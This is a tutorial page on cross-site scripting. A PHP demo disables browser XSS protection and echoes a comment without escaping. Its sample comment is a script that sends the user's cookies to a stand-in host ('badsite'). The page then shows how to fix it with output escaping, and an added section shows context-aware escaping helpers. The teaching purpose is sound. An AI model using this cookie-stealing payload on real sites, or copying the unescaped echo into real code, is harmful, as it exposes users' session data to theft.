ExpertRefresh

XSS attack

1) What is an XSS attack?




2) What protection exists for XSS attacks?






XSS (Cross-Site Scripting)

Any application that displays user input is at risk. The attack works only if the application fails to escape its output, so it is easy to prevent with proper output escaping.

```php
<?php
// Browsers have some XSS protection; we need to disable it for this test example.
// The header is sent first, before any HTML output, so it is not rejected
// with "headers already sent".
header('X-XSS-Protection: 0');
?>

<!-- Logged user data in Cookie -->
<script>
function setCookie(c_name, value, exdays) {
    var exdate = new Date();
    exdate.setDate(exdate.getDate() + exdays);
    var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString());
    document.cookie = c_name + "=" + c_value;
}

setCookie('username', 'john');
setCookie('email', 'john@yahoo.com'); // --- Look Here --- //
</script>

<!-- User submits malicious comment -->
<form method="POST">
    Add a comment:
    <textarea name="comment">
        <script>
            document.location = "badsite/test.php?cookies=" + document.cookie;
        </script>
    </textarea>
    <input type="submit" name="btn_submit"/>
</form>

<!-- Submitted comment is displayed -->
<?php
if (isset($_POST['btn_submit'])) {
    if (!empty($_POST['comment'])) {
        // Vulnerable: the comment is echoed without escaping.
        echo $_POST['comment']; // --- Look Here --- //
        // The browser is redirected to:
        //   badsite/test.php?cookies=username=john; email=john@yahoo.com
        // which exposes the logged-in user's private data.

        // Solution
        // --- Look Here --- //
        // echo filter_var($_POST['comment'], FILTER_SANITIZE_STRING);
        //
        // FILTER_SANITIZE_STRING is deprecated as of PHP 8.1; on current PHP,
        // escape the output instead:
        // echo htmlspecialchars($_POST['comment'], ENT_QUOTES, 'UTF-8');
    }
}
?>
```
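An added example, not part of the original page: the same comment payload escaped for three different output contexts, since the correct escaping depends on where the value lands in the page. The helper names `e_html` and `e_js` are hypothetical, and the payload string is a constructed sample.

```php
<?php
// Added example: context-aware output escaping.
// e_html() and e_js() are hypothetical helper names, not a library API.

// Escape a value for HTML element content and quoted attribute values.
function e_html(string $value): string
{
    // ENT_QUOTES escapes both ' and "; ENT_SUBSTITUTE replaces invalid
    // UTF-8 sequences instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Encode a value as a JavaScript literal for use inside a <script> block.
function e_js($value): string
{
    // The JSON_HEX_* flags emit <, >, &, ' and " as \uXXXX escapes, so the
    // value cannot close the surrounding <script> element or break out of
    // a quoted string.
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Constructed sample input: the comment submitted through the form above.
$comment = '<script>document.location = "badsite/test.php?cookies=" + document.cookie;</script>';

// 1) HTML body context: the markup is rendered as visible text.
echo '<p>' . e_html($comment) . "</p>\n";

// 2) Quoted attribute context: the quotes in the payload cannot end the attribute.
echo '<input type="text" name="comment" value="' . e_html($comment) . "\">\n";

// 3) JavaScript context: the payload is data in a string literal, not code.
echo '<script>var lastComment = ' . e_js($comment) . ";</script>\n";
```

Using `e_html` inside a `<script>` block, or `e_js` inside an attribute, would be the wrong encoder for the context.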